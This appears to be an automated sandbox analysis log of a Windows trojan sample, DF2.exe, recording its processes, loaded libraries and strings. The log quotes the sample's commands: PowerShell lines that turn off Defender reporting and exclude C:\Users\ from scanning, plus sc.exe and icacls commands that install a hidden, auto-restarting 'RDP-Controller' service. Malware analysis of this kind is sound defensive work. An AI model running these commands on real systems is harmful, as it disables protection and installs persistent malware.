Source: DkzUMxZ8.21.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: 6KasAPG0.21.drStatic PE information: Number of sections : 11 > 10
Source: yGODxgsj.21.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: DF2.exe, 00000000.00000002.1655842476.0000000002A3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs DF2.exe
Source: DF2.exe, 00000000.00000000.1653343153.0000000000B46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntegrator.exe@ vs DF2.exe
Source: DF2.exe, 00000001.00000002.2911163955.00000000028CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs DF2.exe
Source: DF2.exeBinary or memory string: OriginalFilenameIntegrator.exe@ vs DF2.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@45/74@2/59
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,5_2_00007FF764CC855D
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,5_2_00007FF764CC1A19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A908C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,21_2_00007FF76A908C4A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A908C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,21_2_00007FF76A908C4A
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess7100
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Users\user\Desktop\DF2.exeFile created: C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.batJump to behavior
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"
Source: DF2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Users\user\Desktop\DF2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: DF2.exeString found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: DF2.exeString found in binary or memory: application/vnd.groove-help
Source: DF2.exeString found in binary or memory: "application/x-install-instructions
Source: unknownProcess created: C:\Users\user\Desktop\DF2.exe "C:\Users\user\Desktop\DF2.exe"
Source: unknownProcess created: C:\Users\user\Desktop\DF2.exe C:\Users\user\Desktop\DF2.exe
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe "C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe"
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Users\user\Desktop\DF2.exe C:\Users\user\Desktop\DF2.exeJump to behavior
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"Jump to behavior
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe "C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe" Jump to behavior
Source: C:\Users\user\Desktop\DF2.exeProcess created: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe "C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.aclJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\DF2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\DF2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
